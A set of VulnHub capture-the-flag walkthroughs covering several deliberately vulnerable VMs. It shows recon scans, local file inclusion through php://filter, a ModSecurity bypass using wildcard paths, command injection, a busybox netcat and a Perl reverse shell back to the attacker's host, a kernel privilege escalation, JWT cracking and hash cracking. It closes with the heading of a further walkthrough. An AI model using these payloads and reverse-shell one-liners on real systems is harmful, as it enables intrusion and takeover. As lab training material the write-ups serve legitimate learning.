Nmap done: 1 IP address (1 host up) scanned in 17.13 seconds
root@ubuntu:~# 

NMAP came back with ports 21,22,80 and 8011 open lets start with port 21. if we connect to the FTP server we see it allows anonymous logins.

root@ubuntu:~# ftp 192.168.56.106
Connected to 192.168.56.106.
220 (vsFTPd 2.3.5)
Name (192.168.56.106:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> exit
221 Goodbye.
root@ubuntu:~# 

We see there is nothing in the directory lets move on to port 80 and see what it has to offer. We first start by running nikto against the remote host.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.106
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.106
+ Target Hostname:    192.168.56.106
+ Target Port:        80
+ Start Time:         2019-10-21 11:26:01 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 07:39:32 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2019-10-21 11:26:16 (GMT-6) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto came back with something about Apaches mod_negotiation being enabled and that it could lead to a brute force of files on the remote system. It gives us two file names index.html and index.html.bak. Lets view the site and see what it looks like.

Looks like a blog of some sort. If we try to view index.html.bak we are asked to download it, so we download it and see this in the source.

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

It looks like a login to a protected directory on the server. Lets fire up JohnTheRipper and crack the hash. After a while we cracked the hash and the password is 'frank!!!' now lets login to the development directory.

It is a list of tools here on the server one which is called the 'uploader' if we try to fuzz some directory names out we find the directory to the upload script.

If we try to upload a simple text file we get the following error.

File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

So we need a image file to upload lets try appending GIF89; to our shell code and try to upload. When we try to upload we still get an error saying that the file was rejected, so its checking against file extenstions also so we need to upload it as a .gif file.

File is an image - image/gif.The file sh.gif has been uploaded to my uploads path.

So we succesufully upload a file but we dont know where the uploads path is. after running some directory discovery scripts I decided to move on. Now I decide to use dirb on the remote host and see what directories it can find.

---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/cgi-bin/ (CODE:403|SIZE 290)                                                                                                               
==> DIRECTORY: http://192.168.56.106/css/                                                                                                                                       
+ http://192.168.56.106/development (CODE:401|SIZE:481)                                                                                                                         
==> DIRECTORY: http://192.168.56.106/img/                                                                                                                                       
+ http://192.168.56.106/index (CODE:200|SIZE:334)                                                                                                                               
+ http://192.168.56.106/index.html (CODE:200|SIZE:13516)                                                                                                                        
==> DIRECTORY: http://192.168.56.106/js/                                                                                                                                        
+ http://192.168.56.106/LICENSE (CODE:200|SIZE:1093)                                                                                                                            
+ http://192.168.56.106/robots (CODE:200|SIZE:21)                                                                                                                               
+ http://192.168.56.106/robots.txt (CODE:200|SIZE:21)                                                                                                                           
+ http://192.168.56.106/server-status (CODE:403|SIZE:295)                                                                                                                       
==> DIRECTORY: http://192.168.56.106/vendor/ 

dirb didnt come back with anything interesting so lets move on to using WFUZZ and see if it finds anything worth while. I used wfuzz but didnt find anything intresting so lets move on to port 8011. We start again by running nikto against the remote host.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.106:8011
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.106
+ Target Hostname:    192.168.56.106
+ Target Port:        8011
+ Start Time:         2019-10-21 12:00:47 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 06:00:08 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7948 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2019-10-21 12:01:00 (GMT-6) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didnt have anything intresting come back, now lets try dirb and see what it finds.

==> DIRECTORY: http://192.168.56.106:8011/api/    

Dirb found a directory api which looks promising, lets navigate to it and see what it says.

Out of the four files listed, only one (files_api.php) is present on the server. Is we navigate to the file we see this:

It says "No parameter called file passed to me" so lets try and pass the file parameter to the script and see what happens.

We have been detected! After playing around with this for a while I came to the conclusion that this wants a POST request instead of a GET request. We can acomplish this by using curl.

root@ubuntu:~# curl -X POST -d "file=/etc/passwd" http://192.168.56.106:8011/api/files_api.php

root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

root@ubuntu:~# 

We see from the output from /etc/passwd that there is one user on the system (frank) and nothing else too intresting. One thing you can do with LFI and PHP is use filters to include files and read their source code which is encoded is base64. If we include the current file we see this:

curl -X POST -d "file=php://filter/convert.base64-encode/resource=files_api.php" http://192.168.56.106:8011/api/files_api.php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "********* HACKER DETECTED *********";
echo "
YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "
WRONG INPUT !!
";
break;
}


if(!isset($file)){

echo "
No parameter called file passed to me
";
echo "
* Note : this API don't use json , so send the file name in raw format
";

}

/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/

We see the php script is a classic example of local file inclusion. If you remember we uploaded a shell to the server but did'nt know the upload directory. We can try and include the file which will give us a shell on the box when it is included.

curl -X POST -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" http://192.168.56.106:8011/api/files_api.php

$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

We found the upload directory lets visit the website and see if we can directory browse.

We see our shell we uploaded. Now our next task is to start a netcat listener on our kali box and the include the file in the LFI we found in api_files.php.

root@kali:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.106: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.106] 55539
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
 08:02:47 up  3:39,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ 

We dropped to a system shell now its time to go searching around the box to see what we can find.

$ cd /home
$ ls
frank
$ cd frank
$ ls -la
total 36
drwxr-xr-x 3 frank frank 4096 Apr 14  2018 .
drwxr-xr-x 3 root  root  4096 Apr 13  2018 ..
-rw------- 1 frank frank   26 Jul 31  2018 .bash_history
-rw-r--r-- 1 frank frank  220 Apr 13  2018 .bash_logout
-rw-r--r-- 1 frank frank 3353 Apr 13  2018 .bashrc
drwxr-xr-x 2 frank frank 4096 Apr 13  2018 .cache
-rw-r--r-- 1 frank frank  675 Apr 13  2018 .profile
-rw-r--r-- 1 frank frank    0 Apr 13  2018 .sudo_as_admin_successful
-rw-r--r-- 1 frank frank   29 Apr 14  2018 PE.txt
-rw-r--r-- 1 frank frank   33 Apr 14  2018 user.txt
$ 

We find two interesting file in franks home directory but nothing else.

www-data@ubuntu:/home/frank$ cat user.txt
cat user.txt
4795aa2a9be22fac10e1c25794e75c1b
www-data@ubuntu:/home/frank$ cat PE.txt
cat PE.txt
Try it as fast as you can ;)
www-data@ubuntu:/home/frank$ 

After doing some research it turns out the kernel is vulnerable to a local root exploit in searchspliot I compile the exploit and wget it to the box from my kali box.

www-data@ubuntu:/tmp$ ./15023
./15023
resolved symbol commit_creds to 0xffffffff810852b0
resolved symbol prepare_kernel_cred to 0xffffffff81085780
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------  4 root root 4096 Apr 14  2018 .
drwxr-xr-x 22 root root 4096 Apr 13  2018 ..
drwx------  2 root root 4096 Apr 13  2018 .aptitude
-rw-------  1 root root   82 Jul 31  2018 .bash_history
-rw-r--r--  1 root root 3106 Apr 23  2010 .bashrc
drwxr-xr-x  2 root root 4096 Apr 14  2018 .cache
-rw-r--r--  1 root root  140 Apr 23  2010 .profile
-rw-r--r--  1 root root   33 Apr 14  2018 root.txt
# cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
# 

That was a fun VM to go through.

VulnHub: MinUv1 Walkthrough

Lets first start of with an nmap scan against the remote host.

root@ubuntu:~/pentest# nmap -sV -sC -O -Pn -p- -T5 192.168.56.105

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-16 15:57 MDT
Warning: 192.168.56.105 giving up on port because retransmission cap hit (2).
Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 16:00 (0:00:00 remaining)
Nmap scan report for 192.168.56.105
Host is up (0.00063s latency).
Not shown: 65529 closed ports
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.27
|_http-server-header: Apache/2.4.27 (Ubuntu)
|_http-title: 403 Forbidden
MAC Address: 08:00:27:6A:86:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Host: 127.0.1.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.38 seconds
root@ubuntu:~/pentest# 

NMAP came back with only port 80 open. if we visit the website we see this:

Our next task is to hit it with nikto to see if it finds anything interesting.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.105
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2019-10-16 16:02:24 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Ubuntu)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 56a9aee1bb80f, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ 7947 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2019-10-16 16:03:39 (GMT-6) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didnt come back with anything of any interest. Lets try dirb and see what it does.

+ http://192.168.56.105/.config (CODE:403|SIZE:296)                                                                                                                                                                               
+ http://192.168.56.105/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:316)                                                                                                                                                           
+ http://192.168.56.105/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:317)                                                                                                                                                          
+ http://192.168.56.105/_vti_bin/shtml.dll (CODE:403|SIZE:307)                                                                                                                                                                    
+ http://192.168.56.105/awstats.conf (CODE:403|SIZE:301)                                                                                                                                                                          
+ http://192.168.56.105/development.log (CODE:403|SIZE:304)                                                                                                                                                                       
+ http://192.168.56.105/global.asa (CODE:403|SIZE:299)                                                                                                                                                                            
+ http://192.168.56.105/global.asax (CODE:403|SIZE:300)                                                                                                                                                                           
+ http://192.168.56.105/index.html (CODE:200|SIZE:10918)                                                                                                                                                                          
+ http://192.168.56.105/main.mdb (CODE:403|SIZE:297)                                                                                                                                                                              
+ http://192.168.56.105/php.ini (CODE:403|SIZE:296)                                                                                                                                                                               
+ http://192.168.56.105/production.log (CODE:403|SIZE:303)                                                                                                                                                                        
+ http://192.168.56.105/readfile (CODE:403|SIZE:416)                                                                                                                                                                              
+ http://192.168.56.105/server-status (CODE:403|SIZE:302)                                                                                                                                                                         
+ http://192.168.56.105/spamlog.log (CODE:403|SIZE:300)                                                                                                                                                                           
+ http://192.168.56.105/thumbs.db (CODE:403|SIZE:298)                                                                                                                                                                             
+ http://192.168.56.105/Thumbs.db (CODE:403|SIZE:298)                                                                                                                                                                             
+ http://192.168.56.105/WS_FTP.LOG (CODE:403|SIZE:299) 

It came back with results but all are 403 forbidden. There could be a WAF in place because most of these files are for IIS lets run wafw00f on the host and see what it says. Wafw00f came back with a positive result, so we know the website is behind a Web Application Firewall and that firewall is ModSecurty. I decide to try wfuzz against it looking for common file and extensions.

sam@ubuntu:~/src/wfuzz$ ./wfuzz -w /wordlist/general/big.txt -w /wordlist/general/extensions_common.txt --hc '403,404' -t 50 http://192.168.56.105/FUZZFUZ2Z

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://192.168.56.105/FUZZFUZ2Z
Total requests: 84672

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                           
===================================================================

000037784:   200        375 L    964 W    10918 Ch    "index - .html"                                                                                                                                                   
000076207:   200        40 L     159 W     1986 Ch    "test - .php"                                                                                                                                                   
sam@ubuntu:~/src/wfuzz$

Wfuzz came back with two files index.html and test.php lets navigate to test.php and see what it is.

Looks like a browser identification page. if we view source we find something interesting.

href='test.php?file=last.html

There could be a LFI/RFI in the test.php If we try to include /etc/passwd we get a 403 forbidden since we are being blocked by the ModSecurity WAF. So I had to google on how you could bypass modsecurity.

http://192.168.56.105/test.php?file=/e?c/?asswd

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false 
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false 
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false 
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false 
messagebus:x:105:109::/var/run/dbus:/bin/false 
_apt:x:106:65534::/nonexistent:/bin/false 
mysql:x:107:110:MySQL Server,,,:/nonexistent:/bin/false 
uuidd:x:108:113::/run/uuidd:/bin/false 
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash

We find the user bob is on the box.

After playing around with the file parameter I found out that this was vulnerable to command injection instead.

<?php echo shell_exec('cat' . $_GET['file']);?>

http://192.168.56.105/test.php?file=a;/b?n/un?me%20-a

If you remember we found the user bob in the /etc/passwd file, lets try and list bobs home directory to see if there is anything interesting in it.

http://192.168.56.105/test.php?file=last.html;%20$u%20ls%20-la%20/home/bob

-rw-r--r-- 1 bob bob 155 Apr 30 2018 ._pw_

We see the file ._pw_ in bobs home directory if we want to view the contents of ._pw_ we can use the head command

http://192.168.56.105/test.php?file=last.html;%20$u%20head%20/home/bob/._pw_

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

Theses are all base64 encoded values which need to be decoded. we can use the base64 utility to decode each string.

{"sub":"1234567890","name":"John Doe","iat":1516239022}

It turns out to be some type of JSON string which can be cracked using c-jwt-cracker.

root@ubuntu:~/src/c-jwt-cracker# ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

Secret is "mlnV1"
root@ubuntu:~/src/c-jwt-cracker#

So now we got the secret, but first we need a shell on the box so we can issue commands from there instead of trying to bypass the waf every time. One way we can do this is with BusyBox. BusyBox combines tiny versions of many common UNIX utilities into a single small executable.

http://192.168.56.105/test.php?file=a;busybox nc 192.168.56.107 4444 -e sh -i

If we setup a listener on our local box we get a connect back and drop to a shell.

root@kali:~# nc -v  -l -p 4444
listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Unknown host
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 48922


BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/var/www/html$

If we try to su to user bob with the password 'mlnV1' we get denied, but if we try to su to root we get a root shell. So the password stored in bobs home directory is the root password to the box. When we cd to /root we see the flag

VulnHub: Blacklight Walkthrough

Lets first start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sS -sV -sC -Pn -O -T5 -p- 192.168.0.40

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-15 13:39 MDT
Nmap scan report for 192.168.0.40
Host is up (0.00049s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe: 
|_    BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9072-TCP:V=7.60%I=7%D=10/15%Time=5DA62126%P=x86_64-pc-linux-gnu%r(N
SF:ULL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20inst
SF:ructions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\
SF:x20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20con
SF:sole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOption
SF:s,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru
SF:ctions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20
SF:\.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\
SF:x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindR
SF:eq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(DNSStatusRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Ty
SF:pe\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20consol
SF:e\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessionReq
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x2
SF:0\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNeg,34,
SF:"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruction
SF:s\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x
SF:20for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString,34,"
SF:BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions
SF:\n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.he
SF:lp\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20console\x
SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,34,"B
SF:LACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\
SF:n")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x
SF:20for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20console\x2
SF:0mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLACKLIGH
SF:T\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.99 seconds
root@ubuntu:~# 

NMAP found two open ports 80 and 9072. lets fire up dirb and start looking for some interesting directories we can browse.

---- Scanning URL: http://192.168.0.40/ ----
==> DIRECTORY: http://192.168.0.40/css/                                                                                                                 
==> DIRECTORY: http://192.168.0.40/fonts/                                                                                                               
==> DIRECTORY: http://192.168.0.40/footer/                                                                                                              
==> DIRECTORY: http://192.168.0.40/img/                                                                                                                 
+ http://192.168.0.40/index.html (CODE:200|SIZE:1759)                                                                                                   
==> DIRECTORY: http://192.168.0.40/javascript/                                                                                                          
==> DIRECTORY: http://192.168.0.40/js/                                                                                                                  
+ http://192.168.0.40/robots.txt (CODE:200|SIZE:40)                                                                                                     
+ http://192.168.0.40/server-status (CODE:403|SIZE:300)                                                                                                 
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/footer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/javascript/ ----
==> DIRECTORY: http://192.168.0.40/javascript/jquery/                                                                                                   
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/javascript/jquery/ ----
+ http://192.168.0.40/javascript/jquery/jquery (CODE:200|SIZE:268026)

Dirb came back with some interesting results which lead to nothing really. Our next step is to see if a robots.txt file exists.

User-agent: *
flag1.txt
blacklight.dic

We got the robots.txt file with two entries in it one of them being a flag. The other file seems to be a dictonrary file we will save for later use.

{flag1:fc4c7223964a26b152823d14f129687207e7fe15}

9072. The secret is at home.

Lets move on to the port 9072. This port seem to be some sort of remote command shell allowing you to run commands. There is one caveat thought, you are limited to only using two commands then the server locks itself from being used. We first try the readhash command to retereive a hash.

b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6

The other command avaiable to us are exec and quit. Lets try to exec a reverse connect shell.

BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec  - Execute commands
.quit - Exit the server

.exec perl -e 'use Socket;$i="192.168.0.42";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We got a successful connect back as root! now lets move on to finding the other flags. We cd to the /home directory where the clue led us to eariler to find the secret.

root@blacklight:/home# cd blacklight

root@blacklight:/home/blacklight# ls -la

total 48
drwxr-xr-x 6 blacklight blacklight 4096 Jun  7  2018 .
drwxr-xr-x 3 root       root       4096 Jun  7  2018 ..
-rw------- 1 blacklight blacklight 1019 Jun  8  2018 .bash_history
-rw-r--r-- 1 blacklight blacklight  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 blacklight blacklight 3771 Apr  4  2018 .bashrc
drwx------ 2 blacklight blacklight 4096 Jun  7  2018 .cache
-rwxrwxr-x 1 blacklight blacklight 1019 Jun  7  2018 console.rb
drwx------ 3 blacklight blacklight 4096 Jun  7  2018 .gnupg
-rw-r--r-- 1 root       root         65 Jun  7  2018 hash.txt
drwxrwxr-x 3 blacklight blacklight 4096 Jun  7  2018 .local
-rw-r--r-- 1 blacklight blacklight  666 Jun  7  2018 .profile
drwxr-xr-x 2 root       root       4096 Jun  7  2018 .secret
-rw-r--r-- 1 blacklight blacklight    0 Jun  7  2018 .sudo_as_admin_successful
root@blacklight:/home/blacklight#

We download the flag2.jpg and use the steg program 'outguess' to read the flag contained in the image.

sam@ubuntu:~$ outguess -r flag2-inside.jpg flag2.txt
Reading flag2-inside.jpg....
Extracting usable bits:   18496 bits
Steg retrieve: seed: 180, len: 133
sam@ubuntu:~$ cat flag2.txt 
{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}

Francis Bacon says: 
BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA
sam@ubuntu:~$ 

VulnHub: HackInOS Walkthrough

Lets start off with a nmap scan of the remote host.

